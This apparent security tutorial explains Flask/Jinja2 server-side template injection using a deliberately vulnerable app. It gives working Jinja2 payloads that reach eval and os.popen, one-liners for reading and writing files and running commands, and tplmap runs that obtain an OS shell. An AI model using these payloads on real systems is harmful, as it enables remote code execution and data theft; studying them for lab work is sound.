Flask(Jinja2)服务端模板注入 Jinja2是用于Python的全功能模板引擎。它具有完整的unicode支持,一个可选的集成沙盒执行环境,已被广泛使用并获得BSD许可。 Jinja2由Django或Flask之类的Python Web框架使用。 Jinja官方网站:https://jinja.palletsprojects.com/en/2.11.x/
实验: flask ssti漏洞的代码: from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') t = Template("Hello " + name) return t.render() if __name__ == "__main__": 访问:
说明存在SSTI漏洞 在python里要执行系统命令需要import os模块。 想要在模板中直接调用内置模块 os,即需要在模板环境中对其注册 需要在上面的代码里加一句: t.globals['os'] = os 如果没有加这一句,直接使用os中的方法会报错。 那么,如何在未注册 os 模块的情况下在模板中调用 popen() 函数执行系统命令呢?这就用到各种下划线函数了。 >>> [].__class__ <type 'list'> >>> [].__class__.__base__ <type 'object'> >>> [].__class__.__base__.__subclasses__() __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 __bases__:用来查看类的基类,也可是使用数组索引来查看特定位置的值 __subclasses__():查看当前类的子类。直接用object.__subclasses__(),也会得到和一样的结果。
由此可以访问到很多其他模块,os模块自然也可以这样访问到。 访问os模块需要从warnings.catch_warnings模块入手的。看一下catch_warnings在哪个位置。 >>> import warnings >>> [].__class__.__base__.__subclasses__().index(warnings.catch_warnings)
当我们获取了位置后,再用func_global看看该模块有哪些global函数 >>> [].__class__.__base__.__subclasses__()[59].__init__.func_globals.keys()
这里能看到linecache,我们要访问的os模块就在这里,看看这个模块的各种属性: >>> [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__
接下来就可以使用os模块了。 >>> [].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os'].system('id')
漏洞利用 获取eval函数并执行任意python代码的POC如下: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("id").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %} 访问 得到执行结果: 查看/etc/passwd
Python进行文件读写/命令执行的常用命令 //获取基本类 ''.__class__.__mro__[1] {}.__class__.__bases__[0] ().__class__.__bases__[0] [].__class__.__bases__[0] object //读文件 ().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read() object.__subclasses__()[40](r'C:\1.php').read()
//写文件 ().__class__.__bases__[0].__subclasses__()[40]('C:\\windows\\temp\\test.txt', 'w').write('2333') object.__subclasses__()[40]('C:\\windows\\temp\\test.txt', 'w').write('2333')
//执行任意命令 ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("dir").read()' ) object.__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ipconfig").read()' )
SSTI测试工具–Tplmap GitHub:https://github.com/epinna/tplmap // 帮助信息 C:\Users\hu1ge\Desktop\tplmap>cmd /k python2 tplmap.py -h Usage: python tplmap.py [options] Options: -h, --help Show help and exit. Target: These options have to be provided, to define the target URL. -u URL, --url=URL Target URL. -X REQUEST, --re.. Force usage of given HTTP method (e.g. PUT). Request: These options have how to connect and where to inject to the target URL. -d DATA, --data=.. Data string to be sent through POST. It must be as query string: param1=value1¶m2=value2. -H HEADERS, --he.. Extra headers (e.g. 'Header1: Value1'). Use multiple times to add new headers. -c COOKIES, --co.. Cookies (e.g. 'Field1=Value1'). Use multiple times to add new cookies. -A USER_AGENT, -.. HTTP User-Agent header value. --proxy=PROXY Use a proxy to connect to the target URL Detection: These options can be used to customize the detection phase. --level=LEVEL Level of code context escape to perform (1-5, Default: 1). -e ENGINE, --eng.. Force back-end template engine to this value. -t TECHNIQUE, --.. Techniques R(endered) T(ime-based blind). Default: RT. Operating system access: These options can be used to access the underlying operating system. --os-cmd=OS_CMD Execute an operating system command. --os-shell Prompt for an interactive operating system shell. --upload=UPLOAD Upload LOCAL to REMOTE files. --force-overwrite Force file overwrite when uploading. --download=DOWNL.. Download REMOTE to LOCAL files. --bind-shell=BIN.. Spawn a system shell on a TCP PORT of the target and connect to it. --reverse-shell=.. Run a system shell and back-connect to local HOST PORT. Template inspection: These options can be used to inspect the template engine. --tpl-shell Prompt for an interactive shell on the template engine. --tpl-code=TPL_C.. Inject code in the template engine. General: These options can be used to set some general working parameters. --force-level=FO.. Force a LEVEL and CLEVEL to test. --injection-tag=.. Use string as injection tag (default '*'). Example: ./tplmap -u 'http://www.target.com/page.php?id=1*' // 模板注入测试 C:\Users\hu1ge\Desktop\tplmap>python2 tplmap.py -u "" [+] Tplmap 0.5 Automatic Server-Side Template Injection Detection and Exploitation Tool [+] Testing if GET parameter 'name' is injectable [+] Smarty plugin is testing rendering with tag '*' [+] Smarty plugin is testing blind injection [+] Mako plugin is testing rendering with tag '${*}' [+] Mako plugin is testing blind injection [+] Python plugin is testing rendering with tag 'str(*)' [+] Python plugin is testing blind injection [+] Tornado plugin is testing rendering with tag '{{*}}' [+] Tornado plugin is testing blind injection [+] Jinja2 plugin is testing rendering with tag '{{*}}' [+] Jinja2 plugin has confirmed injection with tag '{{*}}' [+] Tplmap identified the following injection point: GET parameter: name //注入参数:name Engine: Jinja2 //使用的模板引擎 Injection: {{*}} //注入方法 Context: text OS: posix-linux Technique: render Capabilities: Shell command execution: ok //检验当前环境可使用的利用方法 Bind and reverse shell: ok File write: ok File read: ok Code evaluation: ok, python code [+] Rerun tplmap providing one of the following options: --os-shell 在目标上运行shell --os-cmd 执行shell命令 --bind-shell PORT 连接到目标端口的shell绑定 --reverse-shell HOST PORT 将shell发送回攻击者的端口 --upload LOCAL REMOTE 将文件上载到服务器 --download REMOTE LOCAL 下载远程文件 // --os-cmd 执行命令 C:\Users\hu1ge\Desktop\tplmap>python2 tplmap.py -u "" --os-cmd whoami
// --os-shell 直接获取交互式shell环境 C:\Users\hu1ge\Desktop\tplmap>python2 tplmap.py -u "" --os-shell 参考链接: https://blog.csdn.net/zz_Caleb/article/details/96480967 https://blog.csdn.net/qq_40827990/article/details/82940894 https://github.com/vulhub/vulhub/tree/master/flask/ssti https://blog.csdn.net/qq_40657585/article/details/83657220?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.no